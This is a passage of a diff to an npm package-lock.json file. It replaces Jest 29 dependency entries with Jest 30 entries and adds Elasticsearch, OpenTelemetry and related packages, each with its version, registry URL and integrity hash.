"3.2.0", - "resolved": "https://registry.npmjs.org/istanbul-lib-coverage/-/istanbul-lib-coverage-3.2.0.tgz", - "integrity": "sha512-eOeJ5BHCmHYvQK7xt9GkdHuzuCGS1Y6g9Gvnx3Ym33fz/HpLRYxiS0wHNr+m/MBC8B647Xt608vCDEvhl9c6Mw==", - "dev": true - }, - "istanbul-lib-instrument": { - "version": "5.2.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-instrument/-/istanbul-lib-instrument-5.2.1.tgz", - "integrity": "sha512-pzqtp31nLv/XFOzXGuvhCb8qhjmTVo5vjVk19XE4CRlSWz0KoeJ3bw9XsA7nOp9YBf4qHjwBxkDzKcME/J29Yg==", - "dev": true, - "requires": { - "@babel/core": "^7.12.3", - "@babel/parser": "^7.14.7", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-coverage": "^3.2.0", - "semver": "^6.3.0" - } - }, - "istanbul-lib-report": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", - "integrity": "sha512-wcdi+uAKzfiGT2abPpKZ0hSU1rGQjUQnLvtY5MpQ7QCTahD3VODhcu4wcfY1YtkGaDD5yuydOLINXsfbus9ROw==", - "dev": true, - "requires": { - "istanbul-lib-coverage": "^3.0.0", - "make-dir": "^3.0.0", - "supports-color": "^7.1.0" - } - }, - "istanbul-lib-source-maps": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-source-maps/-/istanbul-lib-source-maps-4.0.1.tgz", - "integrity": "sha512-n3s8EwkdFIJCG3BPKBYvskgXGoy88ARzvegkitk60NxRdwltLOTaH7CUiMRXvwYorl0Q712iEjcWB+fK/MrWVw==", - "dev": true, - "requires": { - "debug": "^4.1.1", - "istanbul-lib-coverage": "^3.0.0", - "source-map": "^0.6.1" - } - }, - "istanbul-reports": { - "version": "3.1.5", - "resolved": "https://registry.npmjs.org/istanbul-reports/-/istanbul-reports-3.1.5.tgz", - "integrity": "sha512-nUsEMa9pBt/NOHqbcbeJEgqIlY/K7rVWUX6Lql2orY5e9roQOthbR3vtY4zzf2orPELg80fnxxk9zUyPlgwD1w==", - "dev": true, - "requires": { - "html-escaper": "^2.0.0", - "istanbul-lib-report": "^3.0.0" - } - }, - "jest": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest/-/jest-29.6.1.tgz", - "integrity": "sha512-Nirw5B4nn69rVUZtemCQhwxOBhm0nsp3hmtF4rzCeWD7BkjAXRIji7xWQfnTNbz9g0aVsBX6aZK3n+23LM6uDw==", - "dev": true, - "requires": { - "@jest/core": "^29.6.1", - "@jest/types": "^29.6.1", - "import-local": "^3.0.2", - "jest-cli": "^29.6.1" - } - }, - "jest-changed-files": { - "version": "29.5.0", - "resolved": "https://registry.npmjs.org/jest-changed-files/-/jest-changed-files-29.5.0.tgz", - "integrity": "sha512-IFG34IUMUaNBIxjQXF/iu7g6EcdMrGRRxaUSw92I/2g2YC6vCdTltl4nHvt7Ci5nSJwXIkCu8Ka1DKF+X7Z1Ag==", - "dev": true, - "requires": { - "execa": "^5.0.0", - "p-limit": "^3.1.0" - } - }, - "jest-circus": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-circus/-/jest-circus-29.6.1.tgz", - "integrity": "sha512-tPbYLEiBU4MYAL2XoZme/bgfUeotpDBd81lgHLCbDZZFaGmECk0b+/xejPFtmiBP87GgP/y4jplcRpbH+fgCzQ==", - "dev": true, - "requires": { - "@jest/environment": "^29.6.1", - "@jest/expect": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "co": "^4.6.0", - "dedent": "^0.7.0", - "is-generator-fn": "^2.0.0", - "jest-each": "^29.6.1", - "jest-matcher-utils": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-runtime": "^29.6.1", - "jest-snapshot": "^29.6.1", - "jest-util": "^29.6.1", - "p-limit": "^3.1.0", - "pretty-format": "^29.6.1", - "pure-rand": "^6.0.0", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - } - }, - "jest-cli": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-cli/-/jest-cli-29.6.1.tgz", - "integrity": "sha512-607dSgTA4ODIN6go9w6xY3EYkyPFGicx51a69H7yfvt7lN53xNswEVLovq+E77VsTRi5fWprLH0yl4DJgE8Ing==", - "dev": true, - "requires": { - "@jest/core": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/types": "^29.6.1", - "chalk": "^4.0.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "import-local": "^3.0.2", - "jest-config": "^29.6.1", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "prompts": "^2.0.1", - "yargs": "^17.3.1" - } - }, - "jest-config": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-config/-/jest-config-29.6.1.tgz", - "integrity": "sha512-XdjYV2fy2xYixUiV2Wc54t3Z4oxYPAELUzWnV6+mcbq0rh742X2p52pii5A3oeRzYjLnQxCsZmp0qpI6klE2cQ==", - "dev": true, - "requires": { - "@babel/core": "^7.11.6", - "@jest/test-sequencer": "^29.6.1", - "@jest/types": "^29.6.1", - "babel-jest": "^29.6.1", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "deepmerge": "^4.2.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-circus": "^29.6.1", - "jest-environment-node": "^29.6.1", - "jest-get-type": "^29.4.3", - "jest-regex-util": "^29.4.3", - "jest-resolve": "^29.6.1", - "jest-runner": "^29.6.1", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "micromatch": "^4.0.4", - "parse-json": "^5.2.0", - "pretty-format": "^29.6.1", - "slash": "^3.0.0", - "strip-json-comments": "^3.1.1" + "node": ">=12.17" } - }, - "jest-diff": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-diff/-/jest-diff-29.6.1.tgz", - "integrity": "sha512-FsNCvinvl8oVxpNLttNQX7FAq7vR+gMDGj90tiP7siWw1UdakWUGqrylpsYrpvj908IYckm5Y0Q7azNAozU1Kg==", + } + }, + "dependencies": { + "@babel/code-frame": { + "version": "7.27.1", + "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.27.1.tgz", + "integrity": "sha512-cjQ7ZlQ0Mv3b47hABuTevyTuYN4i+loJKGeV9flcCgIK37cCXRh+L1bd3iBHlynerhQ7BhCkn2BPbQUL+rGqFg==", "dev": true, "requires": { - "chalk": "^4.0.0", - "diff-sequences": "^29.4.3", - "jest-get-type": "^29.4.3", - "pretty-format": "^29.6.1" + "@babel/helper-validator-identifier": "^7.27.1", + "js-tokens": "^4.0.0", + "picocolors": "^1.1.1" } }, - "jest-docblock": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/jest-docblock/-/jest-docblock-29.4.3.tgz", - "integrity": "sha512-fzdTftThczeSD9nZ3fzA/4KkHtnmllawWrXO69vtI+L9WjEIuXWs4AmyME7lN5hU7dB0sHhuPfcKofRsUb/2Fg==", - "dev": true, - "requires": { - "detect-newline": "^3.0.0" - } + "@babel/helper-validator-identifier": { + "version": "7.27.1", + "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.27.1.tgz", + "integrity": "sha512-D2hP9eA+Sqx1kBZgzxZh0y1trbuU+JoDkiEwqhQ36nodYqJwyEIhPSdMNd7lOm/4io72luTPWH20Yda0xOuUow==", + "dev": true }, - "jest-each": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-each/-/jest-each-29.6.1.tgz", - "integrity": "sha512-n5eoj5eiTHpKQCAVcNTT7DRqeUmJ01hsAL0Q1SMiBHcBcvTKDELixQOGMCpqhbIuTcfC4kMfSnpmDqRgRJcLNQ==", - "dev": true, + "@elastic/elasticsearch": { + "version": "8.18.2", + "resolved": "https://registry.npmjs.org/@elastic/elasticsearch/-/elasticsearch-8.18.2.tgz", + "integrity": "sha512-2pOc/hGdxkbaDavfAlnUfjJdVsFRCGqg7fpsWJfJ2UzpgViIyojdViHg8zOCT1J14lAwvDgb9CNETWa3SBZRfw==", "requires": { - "@jest/types": "^29.6.1", - "chalk": "^4.0.0", - "jest-get-type": "^29.4.3", - "jest-util": "^29.6.1", - "pretty-format": "^29.6.1" + "@elastic/transport": "^8.9.6", + "apache-arrow": "18.x - 19.x", + "tslib": "^2.4.0" } }, - "jest-environment-node": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-environment-node/-/jest-environment-node-29.6.1.tgz", - "integrity": "sha512-ZNIfAiE+foBog24W+2caIldl4Irh8Lx1PUhg/GZ0odM1d/h2qORAsejiFc7zb+SEmYPn1yDZzEDSU5PmDkmVLQ==", - "dev": true, + "@elastic/transport": { + "version": "8.9.6", + "resolved": "https://registry.npmjs.org/@elastic/transport/-/transport-8.9.6.tgz", + "integrity": "sha512-v71jgmZtgPg2ouXF5KTPxU1a6z7YYc8nazAS7jLySteC/vrShs1OJh6oEEeo5oDc19MYUofV/JV1h5vqJVBXOw==", "requires": { - "@jest/environment": "^29.6.1", - "@jest/fake-timers": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "jest-mock": "^29.6.1", - "jest-util": "^29.6.1" + "@opentelemetry/api": "1.x", + "debug": "^4.4.0", + "hpagent": "^1.2.0", + "ms": "^2.1.3", + "secure-json-parse": "^3.0.1", + "tslib": "^2.8.1", + "undici": "^6.21.1" } }, - "jest-get-type": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.4.3.tgz", - "integrity": "sha512-J5Xez4nRRMjk8emnTpWrlkyb9pfRQQanDrvWHhsR1+VUfbwxi30eVcZFlcdGInRibU4G5LwHXpI7IRHU0CY+gg==", + "@jest/diff-sequences": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/@jest/diff-sequences/-/diff-sequences-30.0.1.tgz", + "integrity": "sha512-n5H8QLDJ47QqbCNn5SuFjCRDrOLEZ0h8vAHCK5RL9Ls7Xa8AQLa/YxAc9UjFqoEDM48muwtBGjtMY5cr0PLDCw==", "dev": true }, - "jest-haste-map": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.6.1.tgz", - "integrity": "sha512-0m7f9PZXxOCk1gRACiVgX85knUKPKLPg4oRCjLoqIm9brTHXaorMA0JpmtmVkQiT8nmXyIVoZd/nnH1cfC33ig==", - "dev": true, - "requires": { - "@jest/types": "^29.6.1", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "fsevents": "^2.3.2", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^29.4.3", - "jest-util": "^29.6.1", - "jest-worker": "^29.6.1", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - } + "@jest/get-type": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/@jest/get-type/-/get-type-30.0.1.tgz", + "integrity": "sha512-AyYdemXCptSRFirI5EPazNxyPwAL0jXt3zceFjaj8NFiKP9pOi0bfXonf6qkf82z2t3QWPeLCWWw4stPBzctLw==", + "dev": true }, - "jest-leak-detector": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-leak-detector/-/jest-leak-detector-29.6.1.tgz", - "integrity": "sha512-OrxMNyZirpOEwkF3UHnIkAiZbtkBWiye+hhBweCHkVbCgyEy71Mwbb5zgeTNYWJBi1qgDVfPC1IwO9dVEeTLwQ==", + "@jest/pattern": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/@jest/pattern/-/pattern-30.0.1.tgz", + "integrity": "sha512-gWp7NfQW27LaBQz3TITS8L7ZCQ0TLvtmI//4OwlQRx4rnWxcPNIYjxZpDcN4+UlGxgm3jS5QPz8IPTCkb59wZA==", "dev": true, "requires": { - "jest-get-type": "^29.4.3", - "pretty-format": "^29.6.1" + "@types/node": "*", + "jest-regex-util": "30.0.1" + }, + "dependencies": { + "jest-regex-util": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-30.0.1.tgz", + "integrity": "sha512-jHEQgBXAgc+Gh4g0p3bCevgRCVRkB4VB70zhoAE48gxeSr1hfUOsM/C2WoJgVL7Eyg//hudYENbm3Ne+/dRVVA==", + "dev": true + } } }, - "jest-matcher-utils": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-matcher-utils/-/jest-matcher-utils-29.6.1.tgz", - "integrity": "sha512-SLaztw9d2mfQQKHmJXKM0HCbl2PPVld/t9Xa6P9sgiExijviSp7TnZZpw2Fpt+OI3nwUO/slJbOfzfUMKKC5QA==", - "dev": true, - "requires": { - "chalk": "^4.0.0", - "jest-diff": "^29.6.1", - "jest-get-type": "^29.4.3", - "pretty-format": "^29.6.1" - } + "@opentelemetry/api": { + "version": "1.9.0", + "resolved": "https://registry.npmjs.org/@opentelemetry/api/-/api-1.9.0.tgz", + "integrity": "sha512-3giAOQvZiH5F9bMlMiv8+GSPMeqg0dbaeo58/0SlA9sxSqZhnUtxzX9/2FzyhS9sWQf5S0GJE0AKBrFqjpeYcg==" }, - "jest-message-util": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-message-util/-/jest-message-util-29.6.1.tgz", - "integrity": "sha512-KoAW2zAmNSd3Gk88uJ56qXUWbFk787QKmjjJVOjtGFmmGSZgDBrlIL4AfQw1xyMYPNVD7dNInfIbur9B2rd/wQ==", - "dev": true, + "@swc/helpers": { + "version": "0.5.17", + "resolved": "https://registry.npmjs.org/@swc/helpers/-/helpers-0.5.17.tgz", + "integrity": "sha512-5IKx/Y13RsYd+sauPb2x+U/xZikHjolzfuDgTAl/Tdf3Q8rslRvC19NKDLgAJQ6wsqADk10ntlv08nPFw/gO/A==", "requires": { - "@babel/code-frame": "^7.12.13", - "@jest/types": "^29.6.1", - "@types/stack-utils": "^2.0.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "micromatch": "^4.0.4", - "pretty-format": "^29.6.1", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" + "tslib": "^2.8.0" } }, - "jest-mock": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-mock/-/jest-mock-29.6.1.tgz", - "integrity": "sha512-brovyV9HBkjXAEdRooaTQK42n8usKoSRR3gihzUpYeV/vwqgSoNfrksO7UfSACnPmxasO/8TmHM3w9Hp3G1dgw==", - "dev": true, - "requires": { - "@jest/types": "^29.6.1", - "@types/node": "*", - "jest-util": "^29.6.1" - } + "@types/command-line-args": { + "version": "5.2.3", + "resolved": "https://registry.npmjs.org/@types/command-line-args/-/command-line-args-5.2.3.tgz", + "integrity": "sha512-uv0aG6R0Y8WHZLTamZwtfsDLVRnOa+n+n5rEvFWL5Na5gZ8V2Teab/duDPFzIIIhs9qizDpcavCusCLJZu62Kw==" }, - "jest-pnp-resolver": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/jest-pnp-resolver/-/jest-pnp-resolver-1.2.3.tgz", - "integrity": "sha512-+3NpwQEnRoIBtx4fyhblQDPgJI0H1IEIkX7ShLUjPGA7TtUTvI1oiKi3SR4oBR0hQhQR80l4WAe5RrXBwWMA8w==", - "dev": true, - "requires": {} + "@types/command-line-usage": { + "version": "5.0.4", + "resolved": "https://registry.npmjs.org/@types/command-line-usage/-/command-line-usage-5.0.4.tgz", + "integrity": "sha512-BwR5KP3Es/CSht0xqBcUXS3qCAUVXwpRKsV2+arxeb65atasuXG9LykC9Ab10Cw3s2raH92ZqOeILaQbsB2ACg==" }, - "jest-regex-util": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.4.3.tgz", - "integrity": "sha512-O4FglZaMmWXbGHSQInfXewIsd1LMn9p3ZXB/6r4FOkyhX2/iP/soMG98jGvk/A3HAN78+5VWcBGO0BJAPRh4kg==", + "@types/istanbul-lib-coverage": { + "version": "2.0.6", + "resolved": "https://registry.npmjs.org/@types/istanbul-lib-coverage/-/istanbul-lib-coverage-2.0.6.tgz", + "integrity": "sha512-2QF/t/auWm0lsy8XtKVPG19v3sSOQlJe/YHZgfjb/KBBHOGSV+J2q/S671rcq9uTBrLAXmZpqJiaQbMT+zNU1w==", "dev": true }, - "jest-resolve": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-resolve/-/jest-resolve-29.6.1.tgz", - "integrity": "sha512-AeRkyS8g37UyJiP9w3mmI/VXU/q8l/IH52vj/cDAyScDcemRbSBhfX/NMYIGilQgSVwsjxrCHf3XJu4f+lxCMg==", - "dev": true, - "requires": { - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "jest-pnp-resolver": "^1.2.2", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "resolve": "^1.20.0", - "resolve.exports": "^2.0.0", - "slash": "^3.0.0" - } - }, - "jest-resolve-dependencies": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-resolve-dependencies/-/jest-resolve-dependencies-29.6.1.tgz", - "integrity": "sha512-BbFvxLXtcldaFOhNMXmHRWx1nXQO5LoXiKSGQcA1LxxirYceZT6ch8KTE1bK3X31TNG/JbkI7OkS/ABexVahiw==", - "dev": true, - "requires": { - "jest-regex-util": "^29.4.3", - "jest-snapshot": "^29.6.1" - } - }, - "jest-runner": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-runner/-/jest-runner-29.6.1.tgz", - "integrity": "sha512-tw0wb2Q9yhjAQ2w8rHRDxteryyIck7gIzQE4Reu3JuOBpGp96xWgF0nY8MDdejzrLCZKDcp8JlZrBN/EtkQvPQ==", + "@types/istanbul-lib-report": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/@types/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", + "integrity": "sha512-plGgXAPfVKFoYfa9NpYDAkseG+g6Jr294RqeqcqDixSbU34MZVJRi/P+7Y8GDpzkEwLaGZZOpKIEmeVZNtKsrg==", "dev": true, "requires": { - "@jest/console": "^29.6.1", - "@jest/environment": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "graceful-fs": "^4.2.9", - "jest-docblock": "^29.4.3", - "jest-environment-node": "^29.6.1", - "jest-haste-map": "^29.6.1", - "jest-leak-detector": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-resolve": "^29.6.1", - "jest-runtime": "^29.6.1", - "jest-util": "^29.6.1", - "jest-watcher": "^29.6.1", - "jest-worker": "^29.6.1", - "p-limit": "^3.1.0", - "source-map-support": "0.5.13" + "@types/istanbul-lib-coverage": "*" } }, - "jest-runtime": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-runtime/-/jest-runtime-29.6.1.tgz", - "integrity": "sha512-D6/AYOA+Lhs5e5il8+5pSLemjtJezUr+8zx+Sn8xlmOux3XOqx4d8l/2udBea8CRPqqrzhsKUsN/gBDE/IcaPQ==", + "@types/istanbul-reports": { + "version": "3.0.4", + "resolved": "https://registry.npmjs.org/@types/istanbul-reports/-/istanbul-reports-3.0.4.tgz", + "integrity": "sha512-pk2B1NWalF9toCRu6gjBzR69syFjP4Od8WRAX+0mmf9lAjCRicLOWc+ZrxZHx/0XRjotgkF9t6iaMJ+aXcOdZQ==", "dev": true, "requires": { - "@jest/environment": "^29.6.1", - "@jest/fake-timers": "^29.6.1", - "@jest/globals": "^29.6.1", - "@jest/source-map": "^29.6.0", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "cjs-module-lexer": "^1.0.0", - "collect-v8-coverage": "^1.0.0", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-mock": "^29.6.1", - "jest-regex-util": "^29.4.3", - "jest-resolve": "^29.6.1", - "jest-snapshot": "^29.6.1", - "jest-util": "^29.6.1", - "slash": "^3.0.0", - "strip-bom": "^4.0.0" + "@types/istanbul-lib-report": "*" } }, - "jest-snapshot": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-snapshot/-/jest-snapshot-29.6.1.tgz", - "integrity": "sha512-G4UQE1QQ6OaCgfY+A0uR1W2AY0tGXUPQpoUClhWHq1Xdnx1H6JOrC2nH5lqnOEqaDgbHFgIwZ7bNq24HpB180A==", + "@types/jest": { + "version": "30.0.0", + "resolved": "https://registry.npmjs.org/@types/jest/-/jest-30.0.0.tgz", + "integrity": "sha512-XTYugzhuwqWjws0CVz8QpM36+T+Dz5mTEBKhNs/esGLnCIlGdRy+Dq78NRjd7ls7r8BC8ZRMOrKlkO1hU0JOwA==", "dev": true, "requires": { - "@babel/core": "^7.11.6", - "@babel/generator": "^7.7.2", - "@babel/plugin-syntax-jsx": "^7.7.2", - "@babel/plugin-syntax-typescript": "^7.7.2", - "@babel/types": "^7.3.3", - "@jest/expect-utils": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/prettier": "^2.1.5", - "babel-preset-current-node-syntax": "^1.0.0", - "chalk": "^4.0.0", - "expect": "^29.6.1", - "graceful-fs": "^4.2.9", - "jest-diff": "^29.6.1", - "jest-get-type": "^29.4.3", - "jest-matcher-utils": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1", - "natural-compare": "^1.4.0", - "pretty-format": "^29.6.1", - "semver": "^7.5.3" + "expect": "^30.0.0", + "pretty-format": "^30.0.0" }, "dependencies": { - "lru-cache": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", - "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", + "@jest/expect-utils": { + "version": "30.0.4", + "resolved": "https://registry.npmjs.org/@jest/expect-utils/-/expect-utils-30.0.4.tgz", + "integrity": "sha512-EgXecHDNfANeqOkcak0DxsoVI4qkDUsR7n/Lr2vtmTBjwLPBnnPOF71S11Q8IObWzxm2QgQoY6f9hzrRD3gHRA==", + "dev": true, + "requires": { + "@jest/get-type": "30.0.1" + } + }, + "@jest/schemas": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-30.0.1.tgz", + "integrity": "sha512-+g/1TKjFuGrf1Hh0QPCv0gISwBxJ+MQSNXmG9zjHy7BmFhtoJ9fdNhWJp3qUKRi93AOZHXtdxZgJ1vAtz6z65w==", "dev": true, "requires": { - "yallist": "^4.0.0" + "@sinclair/typebox": "^0.34.0" } }, - "semver": { - "version": "7.5.4", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", - "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", + "@jest/types": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/@jest/types/-/types-30.0.1.tgz", + "integrity": "sha512-HGwoYRVF0QSKJu1ZQX0o5ZrUrrhj0aOOFA8hXrumD7SIzjouevhawbTjmXdwOmURdGluU9DM/XvGm3NyFoiQjw==", "dev": true, "requires": { - "lru-cache": "^6.0.0" + "@jest/pattern": "30.0.1", + "@jest/schemas": "30.0.1", + "@types/istanbul-lib-coverage": "^2.0.6", + "@types/istanbul-reports": "^3.0.4", + "@types/node": "*", + "@types/yargs": "^17.0.33", + "chalk": "^4.1.2" } }, - "yallist": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", - "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", + "@sinclair/typebox": { + "version": "0.34.37", + "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.34.37.tgz", + "integrity": "sha512-2TRuQVgQYfy+EzHRTIvkhv2ADEouJ2xNS/Vq+W5EuuewBdOrvATvljZTxHWZSTYr2sTjTHpGvucaGAt67S2akw==", "dev": true - } - } - }, - "jest-util": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-util/-/jest-util-29.6.1.tgz", - "integrity": "sha512-NRFCcjc+/uO3ijUVyNOQJluf8PtGCe/W6cix36+M3cTFgiYqFOOW5MgN4JOOcvbUhcKTYVd1CvHz/LWi8d16Mg==", - "dev": true, - "requires": { - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "graceful-fs": "^4.2.9", - "picomatch": "^2.2.3" - } - }, - "jest-validate": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-validate/-/jest-validate-29.6.1.tgz", - "integrity": "sha512-r3Ds69/0KCN4vx4sYAbGL1EVpZ7MSS0vLmd3gV78O+NAx3PDQQukRU5hNHPXlyqCgFY8XUk7EuTMLugh0KzahA==", - "dev": true, - "requires": { - "@jest/types": "^29.6.1", - "camelcase": "^6.2.0", - "chalk": "^4.0.0", - "jest-get-type": "^29.4.3", - "leven": "^3.1.0", - "pretty-format": "^29.6.1" - }, - "dependencies": { - "camelcase": { - "version": "6.3.0", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-6.3.0.tgz", - "integrity": "sha512-Gmy6FhYlCY7uOElZUSbxo2UCDH8owEk996gkbrpsgGtrJLM3J7jGxl9Ic7Qwwj4ivOE5AWZWRMecDdF7hqGjFA==", + }, + "ansi-styles": { + "version": "5.2.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", + "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", "dev": true - } - } - }, - "jest-watcher": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-watcher/-/jest-watcher-29.6.1.tgz", - "integrity": "sha512-d4wpjWTS7HEZPaaj8m36QiaP856JthRZkrgcIY/7ISoUWPIillrXM23WPboZVLbiwZBt4/qn2Jke84Sla6JhFA==", - "dev": true, - "requires": { - "@jest/test-result": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "jest-util": "^29.6.1", - "string-length": "^4.0.1" - } - }, - "jest-worker": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.6.1.tgz", - "integrity": "sha512-U+Wrbca7S8ZAxAe9L6nb6g8kPdia5hj32Puu5iOqBCMTMWFHXuK6dOV2IFrpedbTV8fjMFLdWNttQTBL6u2MRA==", - "dev": true, - "requires": { - "@types/node": "*", - "jest-util": "^29.6.1", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - }, - "dependencies": { - "supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", + }, + "ci-info": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ci-info/-/ci-info-4.3.0.tgz", + "integrity": "sha512-l+2bNRMiQgcfILUi33labAZYIWlH1kWDp+ecNo5iisRKrbm0xcRyCww71/YU0Fkw0mAFpz9bJayXPjey6vkmaQ==", + "dev": true + }, + "expect": { + "version": "30.0.4", + "resolved": "https://registry.npmjs.org/expect/-/expect-30.0.4.tgz", + "integrity": "sha512-dDLGjnP2cKbEppxVICxI/Uf4YemmGMPNy0QytCbfafbpYk9AFQsxb8Uyrxii0RPK7FWgLGlSem+07WirwS3cFQ==", + "dev": true, + "requires": { + "@jest/expect-utils": "30.0.4", + "@jest/get-type": "30.0.1", + "jest-matcher-utils": "30.0.4", + "jest-message-util": "30.0.2", + "jest-mock": "30.0.2", + "jest-util": "30.0.2" + } + }, + "jest-diff": { + "version": "30.0.4", + "resolved": "https://registry.npmjs.org/jest-diff/-/jest-diff-30.0.4.tgz", + "integrity": "sha512-TSjceIf6797jyd+R64NXqicttROD+Qf98fex7CowmlSn7f8+En0da1Dglwr1AXxDtVizoxXYZBlUQwNhoOXkNw==", + "dev": true, + "requires": { + "@jest/diff-sequences": "30.0.1", + "@jest/get-type": "30.0.1", + "chalk": "^4.1.2", + "pretty-format": "30.0.2" + } + }, + "jest-matcher-utils": { + "version": "30.0.4", + "resolved": "https://registry.npmjs.org/jest-matcher-utils/-/jest-matcher-utils-30.0.4.tgz", + "integrity": "sha512-ubCewJ54YzeAZ2JeHHGVoU+eDIpQFsfPQs0xURPWoNiO42LGJ+QGgfSf+hFIRplkZDkhH5MOvuxHKXRTUU3dUQ==", + "dev": true, + "requires": { + "@jest/get-type": "30.0.1", + "chalk": "^4.1.2", + "jest-diff": "30.0.4", + "pretty-format": "30.0.2" + } + }, + "jest-message-util": { + "version": "30.0.2", + "resolved": "https://registry.npmjs.org/jest-message-util/-/jest-message-util-30.0.2.tgz", + "integrity": "sha512-vXywcxmr0SsKXF/bAD7t7nMamRvPuJkras00gqYeB1V0WllxZrbZ0paRr3XqpFU2sYYjD0qAaG2fRyn/CGZ0aw==", + "dev": true, + "requires": 